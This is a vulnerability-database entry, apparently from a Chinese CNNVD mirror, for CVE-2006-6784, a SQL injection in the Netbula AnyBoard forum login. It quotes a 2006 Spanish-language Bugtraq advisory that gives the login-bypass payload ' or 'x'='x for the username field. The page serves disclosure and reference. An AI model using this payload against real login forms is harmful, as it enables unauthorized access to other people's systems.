https://cxsecurity.com/issue/WLB-2006120131
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200612-561
Netbula Anyboard登录表单SQL注入漏洞
| 漏洞ID | 1192342 | 漏洞类型 | SQL注入 |
| 发布时间 | 2006-12-27 | 更新时间 | 2007-01-02 |
 CVE编号
|
CVE-2006-6784 |  CNNVD-ID
|
CNNVD-200612-561 |
| 漏洞平台 | N/A | CVSS评分 | 7.5 |
|漏洞来源
|漏洞详情
NetbulaAnyboard存在SQL注入漏洞,远程攻击者可以通过在登录表单内的用户名来执行任意SQL命令。
|漏洞EXP
======================================================================
# Forum AnyBoard - Sql Inyection By Firewall
# Application Affect:
Forum AnyBoard
# Source Code:
http://netbula.com/download/anyboard_free.zip
# Error :
Sql inyecion in login user.
' or 'x'='x
# Contact:
Firewall1954 (at) hotmail (dot) com [email concealed]
# GrEatZ :
|Her0|slackwaren|Ozzmadark|slappter|ArCaX-ATH|CiberPunk|saok|
|InyeXion|napster|Matasanos|Zlevyn|Azrael|CyberAlexis|Furtivo|
|NitroNet|Matasanos|SysRoot|_ANtrAX_|FaLENcE|Mnox|Xneo.System|
"El ceviche y El pisco es peruano y jamas podran igualar su calidad"
"Viva el Peru"
======================================================================|参考资料
来源:BID
名称:21734
链接:http://www.securityfocus.com/bid/21734
来源:BUGTRAQ
名称:20061225ForumAnyBoard-SqlInyectionByFirewall
链接:http://www.securityfocus.com/archive/1/archive/1/455263/100/0/threaded
来源:SREASON
名称:2063
链接:http://securityreason.com/securityalert/2063
检索漏洞
开始时间
结束时间